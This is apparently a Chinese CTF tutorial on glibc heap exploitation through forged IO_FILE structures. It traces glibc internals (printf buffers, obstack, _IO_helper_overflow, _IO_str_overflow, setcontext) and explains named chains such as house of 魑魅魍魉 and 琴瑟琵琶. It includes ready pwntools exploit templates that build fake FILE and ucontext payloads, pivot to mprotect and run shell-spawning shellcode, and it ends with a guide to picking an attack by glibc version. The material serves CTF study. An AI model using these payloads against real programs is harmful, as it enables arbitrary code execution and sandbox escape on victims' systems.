#define Xprintf_buffer_flush Xprintf (buffer_flush)
#define Xprintf_buffer Xprintf (buffer)

bool
Xprintf_buffer_flush (struct Xprintf_buffer *buf)
{
if (__glibc_unlikely (Xprintf_buffer_has_failed (buf)))
return false;

Xprintf (buffer_do_flush) (buf); // __printf_buffer_do_flush(buf)
...
}

如果 file->next.mode = __printf_buffer_mode_obstack(11) 那么会调用 __printf_buffer_flush_obstack 函数

static void
__printf_buffer_do_flush (struct __printf_buffer *buf)
{
switch (buf->mode)
{
...
case __printf_buffer_mode_obstack:
__printf_buffer_flush_obstack ((struct __printf_buffer_obstack *) buf);
return;
}
...
}
__printf_buffer_obstack 结构体定义如下:
struct __printf_buffer_obstack
{
struct __printf_buffer base;
struct obstack *obstack;
char ch;
};
如果满足 buf->base.write_ptr == &buf->ch + 1 则 __printf_buffer_flush_obstack 会执行 obstack_1grow 宏
void
__printf_buffer_flush_obstack (struct __printf_buffer_obstack *buf)
{
...
if (buf->base.write_ptr == &buf->ch + 1)
{
obstack_1grow (buf->obstack, buf->ch);
...
}
...
}
obstack_1grow 宏展开内容如下,可以看到该宏调用了 _obstack_newchunk 函数并将 buf->obstack 作为参数传入
声明位置: obstack.h  
定义:
# define obstack_1grow(OBSTACK, datum) \
__extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + 1 > __o->chunk_limit) \
_obstack_newchunk (__o, 1); \
obstack_1grow_fast (__o, datum); \
(void) 0; })
替换:
({
struct obstack *__o = (buf->obstack);
if (__o->next_free + 1 > __o->chunk_limit)_obstack_newchunk(__o, 1);
(*((__o)->next_free)++ = (buf->ch));
(void) 0;
})
_obstack_newchunk 函数会执行 CALL_CHUNKFUN 宏,这和前面的 House of 琴瑟琵琶利用链相同
void
_obstack_newchunk (struct obstack *h, int length)
{
...
struct _obstack_chunk *new_chunk;
...
new_chunk = CALL_CHUNKFUN (h, new_size);
...
}
综上所述: 1. 在__printf_buffer_as_file_overflow函数中: * file->next->mode!=__printf_buffer_mode_failed && file->next->write_ptr == file->next->write_end 2. 在__printf_buffer_as_file_commit函数中: * file->stream._IO_write_ptr >= file->next->write_ptr * file->stream._IO_write_ptr <= file->next->write_end * file->stream._IO_write_base == file->next->write_base * file->stream._IO_write_end == file->next->write_end 3. 在__printf_buffer_flush函数中: * file->next->mode =__printf_buffer_mode_obstack 4. 在__printf_buffer_flush_obstack函数中: * buf->base.write_ptr == &buf->ch + 1 <==> file->next.write_ptr == &(file->next) + 0x30 + 1 5. 在obstack_1grow宏定义中: * (struct __printf_buffer_obstack *) file->obstack->next_free + 1 > (struct __printf_buffer_obstack *) file->obstack->chunk_limit * (h)->use_extra_arg 不为 0 <==> (struct __printf_buffer_obstack *) file->obstack->use_extra_arg != 0 6. 最终调用(struct __printf_buffer_obstack *) file->obstack->chunkfun((struct __printf_buffer_obstack *) file->obstack->extra_arg) [[./houseofsnake1.png]]

house of 秦月汉关

因为puts函数在开始时候会调用strlen, 我们跟随puts函数找到真正的strlen。可以看出puts会调用strlen的PLT表,PLT表跳转到一个*ABS*@got.plt>的地方,里面存储的才是真正的strlen函数地址,改写这个来getshell ### house of 魑魅魍魉 一般来说一类跳表只有一个,但_IO_helper_jumps比较特殊,通过下面可以看出,跳表会根据COMPILE_WPRINTF值不同而生成不同的,但可能libc在编译时调用两次,所以我们可以在内存中看到两个_IO_helper_jumps,每种各一个。其中COMPILE_WPRINTF == 0先生成,COMPILE_WPRINTF == 1后生成

#ifdef COMPILE_WPRINTF
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_wdefault_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT (xsputn, _IO_wdefault_xsputn),
JUMP_INIT (xsgetn, _IO_wdefault_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_wdefault_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#else
static const struct _IO_jump_t _IO_helper_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT (finish, _IO_default_finish),
JUMP_INIT (overflow, _IO_helper_overflow),
JUMP_INIT (underflow, _IO_default_underflow),
JUMP_INIT (uflow, _IO_default_uflow),
JUMP_INIT (pbackfail, _IO_default_pbackfail),
JUMP_INIT (xsputn, _IO_default_xsputn),
JUMP_INIT (xsgetn, _IO_default_xsgetn),
JUMP_INIT (seekoff, _IO_default_seekoff),
JUMP_INIT (seekpos, _IO_default_seekpos),
JUMP_INIT (setbuf, _IO_default_setbuf),
JUMP_INIT (sync, _IO_default_sync),
JUMP_INIT (doallocate, _IO_default_doallocate),
JUMP_INIT (read, _IO_default_read),
JUMP_INIT (write, _IO_default_write),
JUMP_INIT (seek, _IO_default_seek),
JUMP_INIT (close, _IO_default_close),
JUMP_INIT (stat, _IO_default_stat)
};
#endif

同样,面对不同的COMPILE_WPRINTF所对应的helper_file也有所不同,区别在于是否需要伪造struct _IO_wide_data _wide_data;

struct helper_file
{
struct _IO_FILE_plus _f;
#ifdef COMPILE_WPRINTF
struct _IO_wide_data _wide_data;
#endif
FILE *_put_stream;
#ifdef _IO_MTSAFE_IO
_IO_lock_t lock;
#endif
};

同样,_IO_helper_overflow这个函数在内存中也有 2 份。通过测试发现,如果使用COMPILE_WPRINTF == 0的情况,在攻击过程中s->_IO_write_base会变成largebin->fd_nextsize指针,从而被强制修改无法控制。为了方便,我们使用COMPILE_WPRINTF == 1所生成的_IO_helper_overflow。该函数在攻击过程中的作用是控制_IO_default_xsputn的三个参数

static int _IO_helper_overflow (FILE *s, int c)
{
FILE *target = ((struct helper_file*) s)->_put_stream;
#ifdef COMPILE_WPRINTF
int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base;
if (used)
{
// 利用这个链,显然这三个参数我们都可控。
size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used);
if (written == 0 || written == WEOF)
return WEOF;
__wmemmove (s->_wide_data->_IO_write_base,
s->_wide_data->_IO_write_base + written,
used - written);
s->_wide_data->_IO_write_ptr -= written;
}
#else
// 如果使用这条链,_IO_write_ptr 将处于 largebin 的 bk_size 指针处
int used = s->_IO_write_ptr - s->_IO_write_base;
if (used)
{
size_t written = _IO_sputn (target, s->_IO_write_base, used);
if (written == 0 || written == EOF)
return EOF;
memmove (s->_IO_write_base, s->_IO_write_base + written,
used - written);
s->_IO_write_ptr -= written;
}
#endif
return PUTC (c, s);
}

通过上面函数可以清楚看出,在执行size_t written = _IO_sputn (target, s->_wide_data->_IO_write_base, used)

  • FILE *target = ((struct helper_file*) s)->_put_stream可控
  • s->_wide_data->_IO_write_base可控
  • int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base可控

就达成了3个参数可控的要求,然后通过修改((struct helper_file*) s)->_put_streamvtable指向_IO_str_jumps,使其调用_IO_default_xsputn函数

需要注意的是,s->_wide_data->_IO_write_ptrs->_wide_data->_IO_write_basewchar_t *类型,也就是说used实际是(s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base) >> 2,(在 Linux 系统上,宽字符通常使用UTF-32编码表示,而UTF-32使用32位表示一个字符,因此wchar_t类型在Linux上通常为4字节)

_IO_default_xsputn 函数内要绕过的内容较多。该函数在攻击过程中的作用是两次调用 __mempcpy ,第一次利用任意地址写修改 __mempcpy 对应的 got 表中的值,第二次调用 __mempcpy 劫持程序执行流

size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
// 要 more > count,能再次返回执行 __mempcpy
if (count > more)
count = more;
// 要 count > 20
if (count > 20)
{
// 利用此处实现 house of 借刀杀人,
// 修改 memcpy 的内容为setcontext
// 再次返回的时候就能够实现 house of 一骑当千
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
// 要 more > count,能再次返回执行 __mempcpy
more -= count;
}
// 绕过下面这一行,再次执行for循环的内容
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

需要绕过内容总结如下 * 需要more > count,能再次返回执行__mempcpy,且要想再次返回执行memcpy,由于此时f->_IO_write_ptr_IO_str_overflow函数修改为指向"/bin/sh"字符串,因此count = f->_IO_write_end - f->_IO_write_ptr可能为一个很大的值,导致count > more,进而更新countmore,因此再次循环时要求more > 20。由于上一次循环中依次执行了more -= countmore--语句,因此要求more ≥ count + 1 + 21 * 需要count > 20,因此count至少为21

第一次执行__mempcpy (f->_IO_write_ptr, s, count);

  • _IO_write_ptr__mempcpy表项
  • s为要写入的内容

再次执行__mempcpy (f->_IO_write_ptr, s, count)

  • 需要绕过if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF),具体绕过方式接下来会介绍
  • f->_IO_write_ptrrdi,srsicountrdx

同样,执行_IO_str_overflow需要绕过内容也比较多。该函数的作用是控制fp->_IO_write_ptr,从而控制_IO_default_xsputn第二次循环中__mempcpy的第一个参数

int _IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
// 需要进入来控制 fp->_IO_write_ptr , _flags==0x400
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr; // 控制 fp->_IO_write_ptr 指向 &"/bin/sh" - 1 作为下一次 memcpy(system) 的第一个参数。
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
// 不能进入,要让 _IO_blen (fp) ((fp)->_IO_buf_end - (fp)->_IO_buf_base) 足够大。
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
// 此处 fp->_IO_write_ptr 自加1,所以之前要少1.
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

需要绕过内容总结如下: * _flags = 0x400 * fp->_IO_read_ptr为再次执行__mempcpy (f->_IO_write_ptr, s, count);rdi - 1 * (fp)->_IO_buf_end - (fp)->_IO_buf_base要足够大,一般设置(fp)->_IO_buf_end = 0xFFFFFFFFFFFFFFF0即可

[[./houseofkmwl1.png]]

house of 一骑当千

house_of_一骑当千是一种只用setcontext就定能绕过沙盒攻击手法

ucontext函数族

int getcontext(ucontext_t *ucp);
int setcontext(const ucontext_t *ucp)
void makecontext(ucontext_t *ucp, void (*func)(), int argc, ...);
int swapcontext(ucontext_t *restrict oucp,const ucontext_t *restrict ucp);
  1. getcontext用来获取用户上下文
  2. setcontext用来设置用户上下文
  3. makecontext操作用户上下文,可以设置执行函数,本质调用setcontext
  4. swapcontext进行两个上下文的交换
setcontext

以我们关注的setcontext为例 ,它是由汇编所写,在 /sysdeps/unix/sysv/linux/x86_64/setcontext.S中。剥离复杂的宏之后发现,除了信号量系统调(__NR_rt_sigprocmask)用外,无非就是一些赋值操作。(代码虽然很长,但为了展现全貌我就不做删减了,大家关注中文注释的地方)

ENTRY(__setcontext)
/* Save argument since syscall will destroy it. */
pushq %rdi
cfi_adjust_cfa_offset(8)

/* Set the signal mask with
rt_sigprocmask (SIG_SETMASK, mask, NULL, _NSIG/8). */
leaq oSIGMASK(%rdi), %rsi
xorl %edx, %edx
movl $SIG_SETMASK, %edi
movl $_NSIG8,%r10d
movl $__NR_rt_sigprocmask, %eax
syscall
/* Pop the pointer into RDX. The choice is arbitrary, but
leaving RDI and RSI available for use later can avoid
shuffling values. */
popq %rdx # 这是就是 rdi 向 rdx转换的关键。
cfi_adjust_cfa_offset(-8)
cmpq $-4095, %rax /* Check %rax for error. */
jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */

/* Restore the floating-point context. Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
ldmxcsr oMXCSR(%rdx)


/* Load the new stack pointer, the preserved registers and
registers used for passing args. */
cfi_def_cfa(%rdx, 0)
cfi_offset(%rbx,oRBX)
cfi_offset(%rbp,oRBP)
cfi_offset(%r12,oR12)
cfi_offset(%r13,oR13)
cfi_offset(%r14,oR14)
cfi_offset(%r15,oR15)
cfi_offset(%rsp,oRSP)
cfi_offset(%rip,oRIP)
/* 这里往下就是 setcontext+61 的地方*/
movq oRSP(%rdx), %rsp
movq oRBX(%rdx), %rbx
movq oRBP(%rdx), %rbp
movq oR12(%rdx), %r12
movq oR13(%rdx), %r13
movq oR14(%rdx), %r14
movq oR15(%rdx), %r15

#if SHSTK_ENABLED
/* Check if shadow stack is enabled. */
testl $X86_FEATURE_1_SHSTK, %fs:FEATURE_1_OFFSET
jz L(no_shstk)

/* If the base of the target shadow stack is the same as the
base of the current shadow stack, we unwind the shadow
stack. Otherwise it is a stack switch and we look for a
restore token. */
movq oSSP(%rdx), %rsi
movq %rsi, %rdi

/* Get the base of the target shadow stack. */
movq (oSSP + 8)(%rdx), %rcx
cmpq %fs:SSP_BASE_OFFSET, %rcx
je L(unwind_shadow_stack)

L(find_restore_token_loop):
/* Look for a restore token. */
movq -8(%rsi), %rax
andq $-8, %rax
cmpq %rsi, %rax
je L(restore_shadow_stack)

/* Try the next slot. */
subq $8, %rsi
jmp L(find_restore_token_loop)

L(restore_shadow_stack):
/* Pop return address from the shadow stack since setcontext
will not return. */
movq $1, %rax
incsspq %rax

/* Use the restore stoken to restore the target shadow stack. */
rstorssp -8(%rsi)

/* Save the restore token on the old shadow stack. NB: This
restore token may be checked by setcontext or swapcontext
later. */
saveprevssp

/* Record the new shadow stack base that was switched to. */
movq (oSSP + 8)(%rdx), %rax
movq %rax, %fs:SSP_BASE_OFFSET

L(unwind_shadow_stack):
rdsspq %rcx
subq %rdi, %rcx
je L(skip_unwind_shadow_stack)
negq %rcx
shrq $3, %rcx
movl $255, %esi
L(loop):
cmpq %rsi, %rcx
cmovb %rcx, %rsi
incsspq %rsi
subq %rsi, %rcx
ja L(loop)

L(skip_unwind_shadow_stack):
movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Get the return address set with getcontext. */
movq oRIP(%rdx), %r10

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* Check if return address is valid for the case when setcontext
is invoked from __start_context with linked context. */
rdsspq %rax
cmpq (%rax), %r10
/* Clear RAX to indicate success. NB: Don't use xorl to keep
EFLAGS for jne. */
movl $0, %eax
jne L(jmp)
/* Return to the new context if return address valid. */
pushq %r10
ret

L(jmp):
/* Jump to the new context directly. */
jmp *%r10

L(no_shstk):
#endif
/* The following ret should return to the address set with
getcontext. Therefore push the address on the stack. */
movq oRIP(%rdx), %rcx
pushq %rcx

movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* End FDE here, we fall into another context. */
cfi_endproc
cfi_startproc

/* Clear rax to indicate success. */
xorl %eax, %eax
ret
PSEUDO_END(__setcontext)

weak_alias (__setcontext, setcontext)

ucontext结构体

ucontext函数族中可以看到存在ucontext类型的结构体,也就是传入setcontextrdi。这个结构体如下。

typedef struct ucontext_t
{
unsigned long int __ctx(uc_flags); // 1个字长
struct ucontext_t *uc_link;//1个字长
stack_t uc_stack; //3个字长
mcontext_t uc_mcontext; //操作部分1
sigset_t uc_sigmask; //操作部分2
struct _libc_fpstate __fpregs_mem; //操作部分3
__extension__ unsigned long long int __ssp[4];//操作部分4
} ucontext_t;

setcontext函数中,除了对mcontext_t uc_mcontext; sigset_t uc_sigmask; struct _libc_fpstate __fpregs_mem __ssp这4个进行操作外,并没有对其他部分操作,也就是我们可以不关心其他的值。

  1. uc_sigmask:这个主要是负责信号量,经测试全是0就可以,当然也可以使用其他程序拷贝过来的信号量。

  2. uc_mcontext:这个就是存储寄存器的结构体,也是我们平时setcontext+53所使用的地方。结构体如下

typedef struct
{
gregset_t __ctx(gregs);
/* Note that fpregs is a pointer. */
fpregset_t __ctx(fpregs);
__extension__ unsigned long long __reserved1 [8];
} mcontext_t;
typedef greg_t gregset_t[__NGREG];

#ifdef __USE_GNU
/* Number of each register in the `gregset_t' array. */
enum
{
REG_R8 = 0,
# define REG_R8 REG_R8
REG_R9,
# define REG_R9 REG_R9
REG_R10,
# define REG_R10 REG_R10
REG_R11,
# define REG_R11 REG_R11
REG_R12,
# define REG_R12 REG_R12
REG_R13,
# define REG_R13 REG_R13
REG_R14,
# define REG_R14 REG_R14
REG_R15,
# define REG_R15 REG_R15
REG_RDI,
# define REG_RDI REG_RDI
REG_RSI,
# define REG_RSI REG_RSI
REG_RBP,
# define REG_RBP REG_RBP
REG_RBX,
# define REG_RBX REG_RBX
REG_RDX,
# define REG_RDX REG_RDX
REG_RAX,
# define REG_RAX REG_RAX
REG_RCX,
# define REG_RCX REG_RCX
REG_RSP,
# define REG_RSP REG_RSP
REG_RIP,
# define REG_RIP REG_RIP
REG_EFL,
# define REG_EFL REG_EFL
REG_CSGSFS, /* Actually short cs, gs, fs, __pad0. */
# define REG_CSGSFS REG_CSGSFS
REG_ERR,
# define REG_ERR REG_ERR
REG_TRAPNO,
# define REG_TRAPNO REG_TRAPNO
REG_OLDMASK,
# define REG_OLDMASK REG_OLDMASK
REG_CR2
# define REG_CR2 REG_CR2
};
#endif
  1. __fpregs_mem:这个所对应的步骤为setcontext中的如下内容,作用使加载浮点环境,需要可写。偏移为0xe0
/* Restore the floating-point context.  Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
  1. __ssp:这个所对应的步骤为setcontext中的如下内容,作用使加载 MXCSR 寄存器,经测试0也行,偏移为0x1c0
ldmxcsr oMXCSR(%rdx)

exp

ucontext =b''
ucontext += p64(0)*5
mprotect_len = 0x20000
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0

# 当下面 padding 为空时,fake_io_addr 就是 ucontext 开始的地址
padding = fake_io_file
payload_start_addr = fake_io_addr
# 0x2e8 下面的 print("IO_FILE len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = payload_start_addr + 0x2e8 + 0x10
__rip = mprotect_addr
ucontext += p64(0)*8
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写
print("ucontext len is:",hex(len(ucontext))) # 0xe8

'''
ucontext = ucontext.ljust(0x128,b'\x00')

# 加载信号量 ,好像全是0也行 ,0x10个字长
ucontext += p64(0)*0x10
# ucontext += p64(0)+p64(0x0000002000000000)+p64(0)+p64(0)+p64(0x0000034000000340)+p64(0x0000000000000001)+p64(0x0000000103ae75f6)+p64(0)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0)

ucontext =ucontext.ljust(0x1c0,b'\x00')

# ucontext += p64(0x1f80) # LDMXCSR [rdx+0x1c0] 加载 MXCSR 寄存器,好像是0也行
'''

# payload 可以开始于 fake_io_file ,也可以直接从 ucontext 开始
payload = padding + ucontext

# 0x2e8 与 __rsp相呼应
print("IO_FILE len is",hex(len(payload)))
# 自己写 shellcode
shellcode = """

"""

# largbin_attak 时需要 + 0x10
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10)

payload += bytes(asm(shellcode))

完全体

house of 琴瑟琵琶

exp
 fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(setcontext_addr) # 需要执行的函数
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # 执行函数的 rdi
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # 触发 _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # 因为是largebin attack 所以: 0xd8=0xe8-0x10
# pause()

# 执行函数的 rdi 的地址所存储的内容
ucontext = b''
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # systm 栈帧务必要足够长
# 0x1c8 对应第256行的 print("payload len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = fake_io_addr + 0x1c0 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写

payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x1c0 与__rsp相呼应
# pause()
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # largbin_attak 时需要 +0x10
payload = payload + bytes(shellcode)

house of 魑魅魍魉

exp
# largebin_attack 攻击 house_魑魅魍魉
# 模拟只有一次写入,payload 必须在前面写入
# 为确保正确执行,需要利用 COMPILE_WPRINTF==1 的模式

fake_io_addr = heap_addr + 0x1390
put_stream_offset = 0x30 # put_stream 距离 fake_io 的偏移
put_stream_addr = fake_io_addr + put_stream_offset
write_target_addr = memcpy_addr
target_value_offset = 0x200 # 需要执行的函数存储的地址距离 fake_io 的偏移
target_value_addr = fake_io_addr + target_value_offset


IO_wide_data_addr = fake_io_addr + 0xe0 # len(IO_IFLE) 利用原有的宽字符
# 再一次执行到 memcpy时rdi的地址
rdi_offset = 0xf # 因为 _IO_write_ptr 会加1,此处确保内存对齐
rdi_ucontext_addr = target_value_addr + rdi_offset
# more_len > count_len > 0x20 可以再次执行 memcpy
more_len = 0x80*8 # 为什么 IO_help_jump_0_ 里面还要在右边移位2位??
count_len= 0x28 # 要大于0x20
_flags = 0x400 #_flags == 0x400 执行 fp->_IO_write_ptr = fp->_IO_read_ptr;


fake_io_file = b""
fake_io_file = fake_io_file.ljust(0x20,b'\x00')
fake_io_file += p64(_flags) # 此处是 put_stream 起始地址; _flags == 0x400 执行 fp->_IO_write_ptr = fp->_IO_read_ptr;
fake_io_file += p64(rdi_ucontext_addr)
fake_io_file += p64(0)*2
fake_io_file += p64(write_target_addr - 0x20)
fake_io_file += p64(write_target_addr)
fake_io_file += p64(write_target_addr + count_len)
fake_io_file += p64(0)
# 用于绕过 if (pos >= (size_t) (_IO_blen (fp) + flush_only)) 不执行malloc
fake_io_file += p64((1<<64)-1)
fake_io_file += p64(0)*2
fake_io_file += p64(heap_addr+0x2000) #可写
fake_io_file += p64(0)*2
fake_io_file += p64(IO_wide_data_addr)
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_help_jump_0_addr)
fake_io_file += p64(0)
fake_io_file += p64(heap_addr+0x2000) #可写
fake_io_file += p64(0)
fake_io_file += p64(target_value_addr)
fake_io_file += p64(target_value_addr + more_len)
fake_io_file += p64(IO_str_jumps_addr)
fake_io_file = fake_io_file.ljust(0x1b8,b'\x00')
fake_io_file += p64(put_stream_addr)
fake_io_file = fake_io_file.ljust(target_value_offset - 0x10,b"\x00") # largbin_attak 时需要 - 0x10

# 需要执行的函数是 setcontext,距离 fake_io 的偏移为 target_value_offset
fake_io_file += p64(setcontext_addr) + p64(0) # 此段长度为 0x10 与 rdi_offset 对应


ucontext =b""
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # systm 栈帧务必要足够长
# 0x2e8 下面的 print("payload len is",hex(len(payload)))
# largbin_attak 时需要 + 0x10
__rsp = fake_io_addr + 0x2e8 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rcx)
ucontext += p64(__rax)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] 加载浮点环境,需要可写


payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x2e8 与__rsp相呼应
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # largbin_attak 时需要 + 0x10
payload += bytes(shellcode)

总结

将堆的问题转化为几类: 1. 首先是内存修改的次数,有些题目可以多次(2次及以上)修改内存,有些只能一次 2. 修改内存的情况,有些可以任意写,既可以申请到此块内存;有些不能任意写入,只能写入堆值或者unsortbin地址,例如largebin attack 3. 泄露的情况,除了个别方法外,大都需要泄露内存,有些题目还能够再次泄露内存中的数据,例如泄露ptr_guard,我称为二次泄露。除了个别情况外,大部分题目要想实现“二次泄露”必须要能申请到所要泄露的位置,显然,如果不能对内存有任意写的能力,是不可能实现“二次泄露”的(设置flag的沙雕题目除外)

1.修改内存:地址不限、次数不限、数据不限;可二次泄露

这种题目最为简单,2.34之前打hook,2.34及之后打EOP或者wide_IO都可以,如果有IO函数,还可以攻击house of 秦月汉关,基本上都是以tcache为主。

2.修改内存:地址不限、次数不限、数据不限;不可二次泄露

这种题目基本和上面的情况一样,只是在不能二次泄露的情况下,我们可以直接强制改写。

3.修改内存:地址不限、一次、数据不限;可二次泄露

2.34之前打hook,2.34及之后打EOP或者wide_IO都可以。因为可以二次泄露,所以EOP也可以用。

4.修改内存:地址不限、一次、数据不限;不可二次泄露

2.34之前打hook,2.34及之后打vtableEOPwide_IO都可以。

说明:从这里开始是个转折,一般如果可以任意改写内存都是可以申请到这一块内存,在这种情况下,改写hook是非常直管且简单的,即使2.34之后没有了hook,也可以通过修改vtableEOP等手段来进行攻击。而如果无法任意改写内存则只能够通过IO来进行攻击。

5.修改内存:地址不限、次数不限、修改为堆;可二次泄露(不可能)

如果不能任意改写内存,说明无法申请到这个内存,二次泄露基本不太可能。

6.修改内存:地址不限、次数不限、修改为堆;不可二次泄露

能多次修改内存为堆值攻击选择很多,house_of_emma就是一种选择,当然宽字符的板子也没问题。

7.修改内存:地址不限、一次、修改为堆;可二次泄露(不可能)

同5.

8.修改内存:地址不限、一次、修改为堆;不可二次泄露

这种显然必须伪造IO,使用现有的apple、cat、魑魅魍魉、琴瑟琵琶等链进行攻击。